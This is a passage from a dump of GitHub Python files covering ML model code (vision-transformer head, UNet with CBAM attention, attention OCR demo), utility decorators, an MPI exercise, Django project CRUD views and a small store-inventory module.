== \"none\":\n seq_pool_model = None\n else:\n raise NotImplementedError\n\n if activation is None:\n activation_model = None\n elif activation == Softmax:\n activation_model = activation(dim=1)\n else:\n activation_model = activation()\n\n return VisionTransformerBasicHead(\n sequence_pool=seq_pool_model,\n dropout=Dropout(dropout_rate) if dropout_rate > 0.0 else None,\n proj=Linear(in_features, out_features),\n activation=activation_model,\n )\n","repo_name":"facebookincubator/AITemplate","sub_path":"python/aitemplate/frontend/nn/head.py","file_name":"head.py","file_ext":"py","file_size_in_byte":4940,"program_lang":"python","lang":"en","doc_type":"code","stars":4323,"dataset":"github-code","pt":"53"} +{"seq_id":"21163135122","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nimport functools\nimport os\nimport re\nimport json\nimport wrapt\nimport time\n# from message_queue.tasks import new_template_task\n# from types import GeneratorType\n# from items.base_item import BaseItem\n# from templates.template import Template\n\n\ndef retry(retry_count=0, logger=None):\n \"\"\"\n 重试次数的装饰器\n :param retry_count: 次数\n :param logger: logger\n :return: 装饰函数\n \"\"\"\n def decorator(func):\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n count = 0\n while count < retry_count:\n try:\n res = func(*args, **kwargs)\n return res\n except Exception as e:\n count += 1\n return wrapper\n return decorator\n\n\ndef callback(callback=None):\n @wrapt.decorator\n def wrapper(wrapped, instance, args, kwargs):\n try:\n resp = wrapped(*args, **kwargs)\n if callback:\n callback(resp)\n except Exception as e:\n raise e\n return wrapper\n\n\ndef check_path(path):\n def decorator(func):\n @functools.wraps(func)\n def wrapper():\n if os.path.exists(path):\n func(path)\n else:\n raise FileExistsError(\"Not find file.\")\n return wrapper\n return decorator\n\n\ndef singleton(cls, *args, **kw):\n instances = {}\n\n def _singleton():\n if cls not in instances:\n instances[cls] = cls(*args, **kw)\n return instances[cls]\n return _singleton\n\n\ndef item_format(file):\n @wrapt.decorator\n def wrapper(wrapped, instance, args, kwargs):\n try:\n with open(file, mode='r', encoding='utf-8') as f:\n d = []\n for line in f.readlines():\n k, v = line.split('=')\n d.append({k, v.replace('\\n', '')})\n wrapped(d)\n except Exception as e:\n raise e\n\n return wrapper\n\n\n# def put_request(*args, **kwargs):\n# def decorator(func):\n# @functools.wraps(func)\n# def wrapper(*kargs, **kkwargs):\n# kargs = args\n# kkwargs = kwargs\n# try:\n# return func(*kargs, **kkwargs)\n# except Exception as e:\n# logger.error(e)\n# return wrapper\n# return decorator\n\n\n# def put_task(func):\n# @functools.wraps(func)\n# def wrapper(*args, **kwargs):\n# try:\n# result = func(*args, **kwargs)\n# if isinstance(result, Template):\n# new_template_task(result)\n# elif isinstance(result, list) or isinstance(result, GeneratorType):\n# for res in result:\n# new_template_task(res)\n# except Exception as e:\n# logger.error(e)\n# return wrapper\n\n\n# def put_data(pipeline=None, *arguments, **parameters):\n# def decorator(func):\n# @functools.wraps(func)\n# def wrapper(*args, **kwargs):\n# try:\n# result = func(*args, **kwargs)\n# if isinstance(result, BaseItem):\n# pp = pipeline(*arguments, **parameters)\n# pp.before_process()\n# pp.process(item=result)\n# pp.after_process()\n# elif isinstance(result, list) or isinstance(result, GeneratorType):\n# pp = pipeline(*arguments, **parameters)\n# pp.before_process()\n# for item in result:\n# pp.process(item=item)\n# pp.after_process()\n# else:\n# logger.info('func>>>%s ' % str(func))\n# except Exception as e:\n# logger.error(e)\n# return wrapper\n# return decorator\n\n\ndef _get_last_backslash(strings, regex=re.compile(r\"\\\\*$\")):\n mth = regex.search(strings)\n if mth:\n return mth.group()\n return \"\"\n\n\ndef replace_quote(json_str):\n \"\"\"\n 将要被json.loads的字符串的单引号转换成双引号,\n 如果该单引号是元素主体,而不是用来修饰字符串的。则不对其进行操作。\n :param json_str:\n :return:\n \"\"\"\n if not isinstance(json_str, str):\n return json_str\n\n double_quote = []\n new_lst = []\n for index, val in enumerate(json_str):\n if val == '\"' and not len(_get_last_backslash(json_str[:index])) % 2:\n if double_quote:\n double_quote.pop(0)\n else:\n double_quote.append(val)\n if val == \"'\" and not len(_get_last_backslash(json_str[:index])) % 2:\n if not double_quote:\n val = '\"'\n new_lst.append(val)\n return \"\".join(new_lst)\n\n\ndef safely_json_loads(json_str, defaulttype=dict, escape=True):\n \"\"\"\n 返回安全的json类型\n :param json_str: 要被loads的字符串\n :param defaulttype: 若load失败希望得到的对象类型\n :param escape: 是否将单引号变成双引号\n :return:\n \"\"\"\n if not json_str:\n return defaulttype()\n elif escape:\n data = replace_quote(json_str)\n return json.loads(data)\n else:\n return json.loads(json_str)\n\n\ndef retry_wrapper(\n retry_times, exception=Exception, error_handler=None, interval=0.1):\n \"\"\"\n 函数重试装饰器\n :param retry_times: 重试次数\n :param exception: 需要重试的异常\n :param error_handler: 出错时的回调函数\n :param interval: 重试间隔时间\n :return:\n \"\"\"\n def out_wrapper(func):\n @functools.wraps(func)\n def wrapper(*args, **kwargs):\n count = 0\n while True:\n try:\n return func(*args, **kwargs)\n except exception as e:\n count += 1\n if error_handler:\n result = error_handler(\n func.__name__, count, e, *args, **kwargs)\n if result:\n count -= 1\n if count >= retry_times:\n raise\n time.sleep(interval)\n return wrapper\n return out_wrapper","repo_name":"HyokaChen/DailyNewsSpider","sub_path":"utils/decorator.py","file_name":"decorator.py","file_ext":"py","file_size_in_byte":6332,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"33256207762","text":"from mpi4py import MPI\nimport numpy as np\n\ncomm = MPI.COMM_WORLD\nrank = comm.Get_rank()\nsize = comm.Get_size()\n\nSIZE=12\n\nif rank == 0:\n np.random.seed(42)\n tab = np.random.randint(100, size = SIZE, dtype='i')\nelse:\n tab = None\n\nlocal_tab = np.zeros(4, dtype='i')\ncomm.Scatter(tab, local_tab, root=0)\n\nc_max = np.zeros(1, dtype='i')\nc_pos = np.zeros(1, dtype='i')\nc_max[0] = np.max(local_tab)\nc_pos[0] = np.argmax(local_tab) + rank * 4\nprint(\"Rank: \", rank, \" max: \", c_max, \" pos: \", c_pos)\n\nmax_pos = np.zeros(size, dtype='i')\nmax_val = np.zeros(size, dtype='i')\n\ncomm.Gather(c_max, max_val, root=0)\ncomm.Gather(c_pos, max_pos, root=0)\n\nif rank == 0:\n pos = np.argmax(max_val)\n print(\"Max pos: \", max_pos[pos])\n print(\"Max val: \", max_val)\n\n","repo_name":"jturner116/M1","sub_path":"mpi/TPcodes/mpi_max_pos.py","file_name":"mpi_max_pos.py","file_ext":"py","file_size_in_byte":760,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28348313462","text":"# coding:utf-8\n\n'''\nMarch 2019 by Chen Jun\nhttps://github.com/chenjun2hao/Attention_ocr.pytorch\n\n'''\n\nimport torch\nfrom torch.autograd import Variable\nimport utils\nimport dataset\nfrom PIL import Image\nfrom utils import alphabet\nimport models.crnn_lang as crnn\n\nuse_gpu = True\n\nencoder_path = './expr/attentioncnn/encoder_5.pth'\n# decoder_path = './expr/attentioncnn/decoder_5.pth'\nimg_path = './test_img/20441531_4212871437.jpg'\nmax_length = 15 # 最长字符串的长度\nEOS_TOKEN = 1\n\nnclass = len(alphabet) + 3\nencoder = crnn.CNN(32, 1, 256) # 编码器\n# decoder = crnn.decoder(256, nclass) # seq to seq的解码器, nclass在decoder中还加了2\ndecoder = crnn.decoderV2(256, nclass)\n\n\nif encoder_path and decoder_path:\n print('loading pretrained models ......')\n encoder.load_state_dict(torch.load(encoder_path))\n decoder.load_state_dict(torch.load(decoder_path))\nif torch.cuda.is_available() and use_gpu:\n encoder = encoder.cuda()\n decoder = decoder.cuda()\n\n\nconverter = utils.strLabelConverterForAttention(alphabet)\n\ntransformer = dataset.resizeNormalize((280, 32))\nimage = Image.open(img_path).convert('L')\nimage = transformer(image)\nif torch.cuda.is_available() and use_gpu:\n image = image.cuda()\nimage = image.view(1, *image.size())\nimage = Variable(image)\n\nencoder.eval()\ndecoder.eval()\nencoder_out = encoder(image)\n\ndecoded_words = []\nprob = 1.0\ndecoder_attentions = torch.zeros(max_length, 71)\ndecoder_input = torch.zeros(1).long() # 初始化decoder的开始,从0开始输出\ndecoder_hidden = decoder.initHidden(1)\nif torch.cuda.is_available() and use_gpu:\n decoder_input = decoder_input.cuda()\n decoder_hidden = decoder_hidden.cuda()\nloss = 0.0\n# 预测的时候采用非强制策略,将前一次的输出,作为下一次的输入,直到标签为EOS_TOKEN时停止\nfor di in range(max_length): # 最大字符串的长度\n decoder_output, decoder_hidden, decoder_attention = decoder(\n decoder_input, decoder_hidden, encoder_out)\n probs = torch.exp(decoder_output)\n decoder_attentions[di] = decoder_attention.data\n topv, topi = decoder_output.data.topk(1)\n ni = topi.squeeze(1)\n decoder_input = ni\n prob *= probs[:, ni]\n if ni == EOS_TOKEN:\n # decoded_words.append('')\n break\n else:\n decoded_words.append(converter.decode(ni))\n\nwords = ''.join(decoded_words)\nprob = prob.item()\nprint('predict_str:%-20s => prob:%-20s' % (words, prob))\n","repo_name":"chenjun2hao/Attention_ocr.pytorch","sub_path":"demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":2483,"program_lang":"python","lang":"en","doc_type":"code","stars":347,"dataset":"github-code","pt":"53"} +{"seq_id":"42725699028","text":"import cv2\nimport pytest\n\nfrom demo.images import create_sample_image\nfrom ocr.tesseract import Tesseract, Word\nfrom ocr.types import Image\n\n\n@pytest.fixture\ndef image() -> Image:\n _name, image = create_sample_image()\n return image\n\n\n@pytest.fixture\ndef extractor():\n return Tesseract()\n\n\ndef test_detect(image, extractor):\n assert isinstance(image, Image)\n assert hasattr(extractor, \"detect\")\n\n data = extractor.detect(image, lang=\"ita\")\n assert isinstance(data, list)\n assert isinstance(data[0], Word)\n","repo_name":"archiviofontiorali/afor-ocr","sub_path":"tests/test_detection.py","file_name":"test_detection.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21932380967","text":"# Faça um programa que calcule a soma de 5 números digitados pelo usuário.\n\nprint('Bem vindo ao programa de cálculo da soma de cinco números!')\n\ncontador = 1\nsoma_total = 0\n\nwhile contador <= 5:\n numero = int(input(f'Digite um número ({contador}/5): '))\n soma_total += numero\n contador += 1\n\nprint(f'\\nSoma dos cinco números: {soma_total}')\n","repo_name":"mateusadada/python-IPO-UDESC","sub_path":"Exercícios resolvidos/exercise_022.py","file_name":"exercise_022.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13064658887","text":"import argparse\nimport json\n\nfrom anytree.exporter import UniqueDotExporter\nfrom anytree.importer import DictImporter\n\nimporter = DictImporter()\n\n\ndef remove_dots(obj):\n for key in obj.keys():\n new_key = key.replace(\"node_type\", \"name\")\n if new_key != key:\n if obj['value'].strip() in ['{', '}', '']:\n obj[new_key] = \"Node_type: \" + obj[key] + \"\\n\" + \"Line: \" + str(\n obj['line'])\n else:\n obj[new_key] = \"Node_type: \" + obj[key] + \"\\n\" + \"Value: \" + obj['value'] + \"\\n\" + \"Line: \" + str(\n obj['line'])\n del obj[key]\n return obj\n\n\nif __name__ == '__main__':\n arg_parser = argparse.ArgumentParser(description='Tree Gnerator!')\n arg_parser.add_argument(\"--i\", default=\"AST.json\", type=str, help=\"Input JSON file with Nodes\")\n arg_parser.add_argument(\"--o\", default=\"tree.png\", type=str, help=\"Output image for tree \")\n args: argparse.Namespace = arg_parser.parse_args()\n input_filename: str = args.i\n output_filename: str = args.o\n\n with open(input_filename) as json_file:\n data = json.load(json_file)\n\n new_json = json.loads(json.dumps(data), object_hook=remove_dots)\n\n root = importer.import_(new_json)\n\n UniqueDotExporter(root).to_picture(output_filename)\n","repo_name":"exomatt/aitsi","sub_path":"main_tree-gen.py","file_name":"main_tree-gen.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"4628845724","text":"import pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndane = pd.read_csv('wine_results.csv',sep=';',encoding='cp1250',na_values=None)\npd.set_option('display.width', 400)\nprint(dane)\n\n#KORELACJA\ncorr = dane.corr()\nprint(corr)\n#Rysujemy\nmask = np.zeros_like(corr)\nmask[np.triu_indices_from(mask)] = True\nsns.heatmap(corr, mask=mask) # sprawia że jest tylko po jednej stronie)\nplt.xticks(rotation=40)\nplt.yticks(rotation=40)\nplt.tight_layout()\nplt.title('Korelacja',y=0.98)\nplt.show()","repo_name":"theSaint92/5_sztuczna_inteligencja_i_systemy_ekspertowe","sub_path":"knn/korelacja/korelacja.py","file_name":"korelacja.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32510480525","text":"from tensorflow.keras import models, layers\nfrom tensorflow.keras import regularizers\nimport tensorflow as tf\nfrom tensorflow import keras\n\ndef UNet(input_shape,input_label_channel, layer_count=64, regularizers = regularizers.l2(0.0001), gaussian_noise=0.1, weight_file = None):\n \"\"\" Method to declare the UNet model.\n\n Args:\n input_shape: tuple(int, int, int, int)\n Shape of the input in the format (batch, height, width, channels).\n input_label_channel: list([int])\n list of index of label channels, used for calculating the number of channels in model output.\n layer_count: (int, optional)\n Count of kernels in first layer. Number of kernels in other layers grows with a fixed factor.\n regularizers: keras.regularizers\n regularizers to use in each layer.\n weight_file: str\n path to the weight file.\n \"\"\"\n\n input_img = layers.Input(input_shape[1:], name='Input')\n pp_in_layer = input_img\n# pp_in_layer = layers.GaussianNoise(gaussian_noise)(input_img)\n# pp_in_layer = layers.BatchNormalization()(pp_in_layer)\n\n\n c1 = layers.Conv2D(1*layer_count, (3, 3), activation='relu', padding='same')(pp_in_layer)\n c1 = layers.Conv2D(1*layer_count, (3, 3), activation='relu', padding='same')(c1)\n n1 = layers.BatchNormalization()(c1)\n p1 = layers.MaxPooling2D((2, 2))(n1)\n p1 = CBAM_attention(p1) + p1\n\n c2 = layers.Conv2D(2*layer_count, (3, 3), activation='relu', padding='same')(p1)\n c2 = layers.Conv2D(2*layer_count, (3, 3), activation='relu', padding='same')(c2)\n n2 = layers.BatchNormalization()(c2)\n p2 = layers.MaxPooling2D((2, 2))(n2)\n p2 = CBAM_attention(p2) + p2\n\n c3 = layers.Conv2D(4*layer_count, (3, 3), activation='relu', padding='same')(p2)\n c3 = layers.Conv2D(4*layer_count, (3, 3), activation='relu', padding='same')(c3)\n n3 = layers.BatchNormalization()(c3)\n p3 = layers.MaxPooling2D((2, 2))(n3)\n p3 = CBAM_attention(p3) + p3\n\n c4 = layers.Conv2D(8*layer_count, (3, 3), activation='relu', padding='same')(p3)\n c4 = layers.Conv2D(8*layer_count, (3, 3), activation='relu', padding='same')(c4)\n n4 = layers.BatchNormalization()(c4)\n p4 = layers.MaxPooling2D(pool_size=(2, 2))(n4)\n p4 = CBAM_attention(p4) + p4\n\n c5 = layers.Conv2D(16*layer_count, (3, 3), activation='relu', padding='same')(p4)\n c5 = layers.Conv2D(16*layer_count, (3, 3), activation='relu', padding='same')(c5)\n\n u6 = layers.UpSampling2D((2, 2))(c5)\n n6 = layers.BatchNormalization()(u6)\n u6 = layers.concatenate([n6, n4])\n c6 = layers.Conv2D(8*layer_count, (3, 3), activation='relu', padding='same')(u6)\n c6 = layers.Conv2D(8*layer_count, (3, 3), activation='relu', padding='same')(c6)\n\n u7 = layers.UpSampling2D((2, 2))(c6)\n n7 = layers.BatchNormalization()(u7)\n u7 = layers.concatenate([n7, n3])\n c7 = layers.Conv2D(4*layer_count, (3, 3), activation='relu', padding='same')(u7)\n c7 = layers.Conv2D(4*layer_count, (3, 3), activation='relu', padding='same')(c7)\n\n u8 = layers.UpSampling2D((2, 2))(c7)\n n8 = layers.BatchNormalization()(u8)\n u8 = layers.concatenate([n8, n2])\n c8 = layers.Conv2D(2*layer_count, (3, 3), activation='relu', padding='same')(u8)\n c8 = layers.Conv2D(2*layer_count, (3, 3), activation='relu', padding='same')(c8)\n\n u9 = layers.UpSampling2D((2, 2))(c8)\n n9 = layers.BatchNormalization()(u9)\n u9 = layers.concatenate([n9, n1])\n c9 = layers.Conv2D(1*layer_count, (3, 3), activation='relu', padding='same')(u9)\n c9 = layers.Conv2D(1*layer_count, (3, 3), activation='relu', padding='same')(c9)\n c9 = layers.Dropout(.2)(c9)#, training=True)\n \n d = layers.Conv2D(len(input_label_channel), (1, 1), activation='sigmoid', kernel_regularizer= regularizers)(c9)\n\n seg_model = models.Model(inputs=[input_img], outputs=[d])\n if weight_file:\n seg_model.load_weights(weight_file)\n seg_model.summary()\n return seg_model\n\n# (1) Channel Attention\ndef channel_attention(inputs, ratio=0.25):\n '''ratio represents the multiplier for reducing the number of channels in the first fully connected layer'''\n\n channel = inputs.shape[-1] # Get the number of channels in the input feature map\n\n # Apply global max-pooling and global average-pooling to the output feature map separately\n # [h,w,c] => [None,c]\n x_max = layers.GlobalMaxPooling2D()(inputs)\n x_avg = layers.GlobalAveragePooling2D()(inputs)\n\n # [None,c] => [1,1,c]\n x_max = layers.Reshape([1,1,-1])(x_max) # -1 automatically finds the channel dimension size\n x_avg = layers.Reshape([1,1,-1])(x_avg) # Alternatively, you can use the variable 'channel' instead of -1\n\n # Reduce the number of channels by 1/4 in the first fully connected layer, [1,1,c] => [1,1,c//4]\n x_max = layers.Dense(channel*ratio)(x_max)\n x_avg = layers.Dense(channel*ratio)(x_avg)\n\n # Apply ReLU activation\n x_max = layers.Activation('relu')(x_max)\n x_avg = layers.Activation('relu')(x_avg)\n\n # Increase the number of channels in the second fully connected layer, [1,1,c//4] => [1,1,c]\n x_max = layers.Dense(channel)(x_max)\n x_avg = layers.Dense(channel)(x_avg)\n\n # Sum the results, [1,1,c] + [1,1,c] => [1,1,c]\n x = layers.Add()([x_max, x_avg])\n\n # Normalize the weights using sigmoid\n x = tf.nn.sigmoid(x)\n\n # Multiply the input feature map by the weight vector to assign weights to each channel\n x = layers.Multiply()([inputs, x]) # [h,w,c] * [1,1,c] => [h,w,c]\n\n return x\n\n# (2) Spatial Attention\ndef spatial_attention(inputs):\n\n # Perform max-pooling and average-pooling over the channel dimension [b,h,w,c] => [b,h,w,1]\n # Set keepdims=False to get [b,h,w,c] => [b,h,w]\n x_max = tf.reduce_max(inputs, axis=3, keepdims=True) # Compute the maximum value over the channel dimension\n x_avg = tf.reduce_mean(inputs, axis=3, keepdims=True) # 'axis' can also be -1\n\n # Stack the results over the channel dimension [b,h,w,2]\n x = layers.concatenate([x_max, x_avg])\n\n # Adjust the channels using a 1*1 convolution [b,h,w,1]\n x = layers.Conv2D(filters=1, kernel_size=(1,1), strides=1, padding='same')(x)\n\n # Normalize the weights using the sigmoid function\n x = tf.nn.sigmoid(x)\n\n # Multiply the input feature map by the weight vector\n x = layers.Multiply()([inputs, x])\n\n return x\n\n# (3) CBAM Attention\ndef CBAM_attention(inputs):\n\n # Apply channel attention first and then spatial attention\n x = channel_attention(inputs)\n x = spatial_attention(x)\n return x","repo_name":"arthurweijiawei/ACM_SIGSPATIAL_Cup2023","sub_path":"MainProject/core/UNetAttention.py","file_name":"UNetAttention.py","file_ext":"py","file_size_in_byte":6822,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"8021678227","text":"import logging\n\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom .serializers import ProjectSerializer, ProjectRequestSerializer\n\nfrom .models import Projects\n\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef get_all_projects(request):\n logging.info(\"######## Getting All Project\")\n projects = Projects.objects.filter(user=request.user)\n serializer = ProjectSerializer(projects, many=True)\n return Response(serializer.data)\n\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef get_project(request, pk):\n logging.info(\"######## Getting Project by id {pk}\")\n\n try:\n project = Projects.objects.get(pk=pk, user=request.user)\n except Projects.DoesNotExist:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n serializer = ProjectSerializer(project)\n return Response(serializer.data)\n\n\n@api_view(['POST'])\n@permission_classes([IsAuthenticated])\ndef create_project(request):\n logging.info(f\"######## Creating Project: {request}\")\n\n serializer = ProjectRequestSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save(user=request.user)\n return Response(serializer.data, status=status.HTTP_201_CREATED)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n@api_view(['PUT'])\n@permission_classes([IsAuthenticated])\ndef update_project(request, pk):\n logging.info(f\"######## updating Project: {request} ---- {pk}\")\n\n try:\n project = Projects.objects.get(pk=pk, user=request.user)\n except Projects.DoesNotExist:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n serializer = ProjectRequestSerializer(project, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\n@api_view(['DELETE'])\n@permission_classes([IsAuthenticated])\ndef delete_project(request, pk):\n logging.info(f\"######## Deleting Project: {request} ---- {pk}\")\n try:\n project = Projects.objects.get(pk=pk, user=request.user)\n except Projects.DoesNotExist:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n project.delete()\n return Response(status=status.HTTP_204_NO_CONTENT)\n","repo_name":"koushindrak/task_manager_backend_django","sub_path":"ProjectApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2416,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"37722936626","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Mar 5 16:17:40 2019\r\n@author: Robinson Wallace\r\n\r\nPurpose: To reorder nexrad data so that each scan has it's 0 azimuth degree \r\n located in the 0th index for each radar elevation scan. PyArt does\r\n this behind the scenes, but we do this here for simplicity of analysis\r\n\r\n\"\"\"\r\n\r\nimport os\r\nimport pyart\r\nimport numpy as np\r\n\r\n\r\ndef read_format_nexrad_lvl2(data_path):\r\n\r\n radexit = 0\r\n while True:\r\n \r\n # Make a reflectivity volume\r\n try:\r\n radar = pyart.io.read(data_path)\r\n radexit = 0\r\n except:\r\n # Sometimes there is an error in reading the radar file\r\n print('Something went wrong, retrying...')\r\n radexit =1\r\n \r\n if radexit == 1:\r\n print('Unable to load in NEXRAD file.')\r\n break\r\n \r\n rad_lat = radar.latitude['data'][0]\r\n rad_lon = radar.longitude['data'][0]\r\n radhght = radar.altitude['data'][0]\r\n \r\n sweep_start_inds = radar.sweep_start_ray_index['data']\r\n sweep_end_inds = radar.sweep_end_ray_index['data']\r\n n_azm = 360 #radar.nrays\r\n n_rng = radar.ngates\r\n n_elv = radar.nsweeps\r\n r_elv = np.zeros((n_elv))\r\n ref_vol = np.zeros((n_azm,n_rng,n_elv),dtype=np.float32)\r\n zdr_vol = np.zeros((n_azm,n_rng,n_elv),dtype=np.float32)\r\n rhv_vol = np.zeros((n_azm,n_rng,n_elv),dtype=np.float32)\r\n vel_vol = np.zeros((n_azm,n_rng,n_elv),dtype=np.float32)\r\n \r\n \r\n \"\"\"\r\n The data comes as a long stream of data, not broken up into sweeps, so we\r\n have to do that. Some scans are 720 degrees while ohters are 360. We'll just\r\n drop the inbetween data for the 720 degree measurements. In the process, shift\r\n the azimuth scan so that north is at the first index\r\n \"\"\"\r\n \r\n for e in range(0,n_elv):\r\n \r\n # For the sweeps of 720 azimuths\r\n if sweep_end_inds[e]-sweep_start_inds[e] == 719:\r\n f_azm = np.where(radar.azimuth['data'][sweep_start_inds[e]:sweep_end_inds[e]:2]<1)[0]\r\n # If the radar doesn't do a complete scan, the azimuths may not start at zero\r\n if len(f_azm) == 0:\r\n continue\r\n ref = radar.fields['reflectivity']['data'][sweep_start_inds[e]:sweep_end_inds[e]:2,:]\r\n ref_sft = np.roll(ref,-f_azm[0],0)\r\n ref_vol[:,:,e] = ref_sft\r\n \r\n zdr = radar.fields['differential_reflectivity']['data'][sweep_start_inds[e]:sweep_end_inds[e]:2,:]\r\n zdr_sft = np.roll(zdr,-f_azm[0],0)\r\n zdr_vol[:,:,e] = zdr_sft\r\n \r\n rhv = radar.fields['cross_correlation_ratio']['data'][sweep_start_inds[e]:sweep_end_inds[e]:2,:]\r\n rhv_sft = np.roll(rhv,-f_azm[0],0)\r\n rhv_vol[:,:,e] = rhv_sft\r\n \r\n vel = radar.fields['velocity']['data'][sweep_start_inds[e]:sweep_end_inds[e]:2,:]\r\n vel_sft = np.roll(vel,-f_azm[0],0)\r\n vel_vol[:,:,e] = vel_sft\r\n \r\n r_elv[e] = radar.elevation['data'][sweep_start_inds[e]]\r\n \r\n if sweep_end_inds[e]-sweep_start_inds[e] == 359:\r\n f_azm = np.where(radar.azimuth['data'][sweep_start_inds[e]:sweep_end_inds[e]+1]<1)[0]\r\n if len(f_azm) == 0:\r\n continue\r\n \r\n ref = radar.fields['reflectivity']['data'][sweep_start_inds[e]:sweep_end_inds[e]+1,:]\r\n ref_sft = np.roll(ref,-f_azm[0],0)\r\n ref_vol[:,:,e] = ref_sft\r\n \r\n zdr = radar.fields['differential_reflectivity']['data'][sweep_start_inds[e]:sweep_end_inds[e]+1,:]\r\n zdr_sft = np.roll(zdr,-f_azm[0],0)\r\n zdr_vol[:,:,e] = zdr_sft\r\n \r\n rhv = radar.fields['cross_correlation_ratio']['data'][sweep_start_inds[e]:sweep_end_inds[e]+1,:]\r\n rhv_sft = np.roll(rhv,-f_azm[0],0)\r\n rhv_vol[:,:,e] = rhv_sft\r\n \r\n vel = radar.fields['velocity']['data'][sweep_start_inds[e]:sweep_end_inds[e]+1,:]\r\n vel_sft = np.roll(vel,-f_azm[0],0)\r\n vel_vol[:,:,e] = vel_sft\r\n \r\n r_elv[e] = radar.elevation['data'][sweep_start_inds[e]]\r\n \r\n r_gate = radar.range['data']\r\n \r\n # Sometimes PyART doesn't decode the data correctly, so we can try it until it does\r\n # This has been coded to evacuate the loop if the data just truely sucks\r\n if len(r_elv) > 2:\r\n break\r\n else:\r\n print(\"Bad computation of elevation scans. Retrying...\")\r\n radexit += 1\r\n if radexit == 2:\r\n break\r\n \r\n if radexit == 2:\r\n print(\"WARNING: Radar Data is erroneous (Bad elevation scans)\")\r\n \r\n \r\n radar_time = radar.time['units'][14:]\r\n year = radar_time.split('-')[0]\r\n month = radar_time.split('-')[1]\r\n day = radar_time.split('-')[2][0:2]\r\n hour = radar_time.split('-')[2].split(':')[0][3:5]\r\n minute = radar_time.split('-')[2].split(':')[1]\r\n second = radar_time.split('-')[2].split(':')[2]\r\n \r\n if radexit >= 1: return None\r\n \r\n return {\"ref\":ref_vol,\"zdr\":zdr_vol,\"rhv\":rhv_vol,\"velocity\":vel_vol,\r\n \"azim\":np.arange(0,360),\"gate\":r_gate,\"elv\":r_elv,\r\n \"year\":year,\"month\":month,\"day\":day,\"hour\":hour,\"minute\":minute,\r\n \"second\":second,\"radar_altitude\":radhght,\"radar_latitude\":rad_lat,\r\n \"radar_longitude\":rad_lon}\r\n \r\nif __name__ == '__main__':\r\n \r\n # Input a filepath to a nexrad data file\r\n vol = read_format_nexrad_lvl2('')\r\n","repo_name":"RWallace2357/radar_surface_gauge_validation","sub_path":"read_format_nexrad.py","file_name":"read_format_nexrad.py","file_ext":"py","file_size_in_byte":5904,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"1321966849","text":"from typing import Dict\nfrom type_definitions import CustomerInfoType, ItemInfoType\nfrom utils import (\n handle_operation_errors,\n is_valid_category,\n is_valid_customer,\n is_valid_item_info,\n)\n\n\nclass Store:\n \"\"\"\n Represents a store that manages categories and items.\n \"\"\"\n\n def __init__(self):\n self.categories: Dict[str, Category] = {}\n self.items: Dict[str, Item] = {}\n\n @handle_operation_errors\n def add_category(self, name: str):\n \"\"\"\n Add a new category to the store.\n \"\"\"\n\n is_valid_category(name)\n\n if name in self.categories:\n raise ValueError(f\"Category {name} already exists!\")\n\n self.categories[name] = Category(name)\n print(f\"\\n\\nCategory {name} added successfully!\\n\\n\")\n\n @handle_operation_errors\n def add_item(self, item_info: ItemInfoType):\n \"\"\"\n Add a new item to the store.\n \"\"\"\n\n is_valid_item_info(item_info)\n\n product_category = item_info.get(\"product_category\")\n category = self.categories.get(product_category)\n\n if category:\n ids = [item.id for item in self.items.values()]\n id = item_info.get(\"id\")\n if id in ids:\n raise ValueError(f\"An Item with id: {id} already exist!\")\n\n item = Item(item_info)\n category.add_item(item)\n self.items[id] = item\n print(f\"\\n\\nItem: {item.name} added successfully!\\n\\n\")\n else:\n raise ValueError(f\"Category: {product_category} does not exist.\")\n\n @handle_operation_errors\n def get_item_by_id(self, item_id: int):\n \"\"\"\n Get an item from the store by its ID.\n \"\"\"\n\n item = self.items.get(item_id)\n if not item:\n raise KeyError(f\"Item with id: {item_id} does not exist!\")\n\n return item\n\n @handle_operation_errors\n def delete_item(self, id: int):\n \"\"\"\n Delete an item from the store by its ID.\n \"\"\"\n\n if id in self.items:\n del self.items[id]\n print(f\"\\n\\nItem with id: {id} removed from store!\\n\\n\")\n else:\n raise KeyError(f\"Item with id: {id} not found!\")\n\n\nclass Category:\n \"\"\"\n Represents a category in the store.\n \"\"\"\n\n def __init__(self, name: str):\n self.name = name\n self.items = {}\n\n def add_item(self, item):\n \"\"\"\n Add an item to the category.\n \"\"\"\n\n self.items[item.id] = item\n\n\nclass Item:\n \"\"\"\n Represents an item in the store.\n \"\"\"\n\n def __init__(self, item_info: ItemInfoType):\n 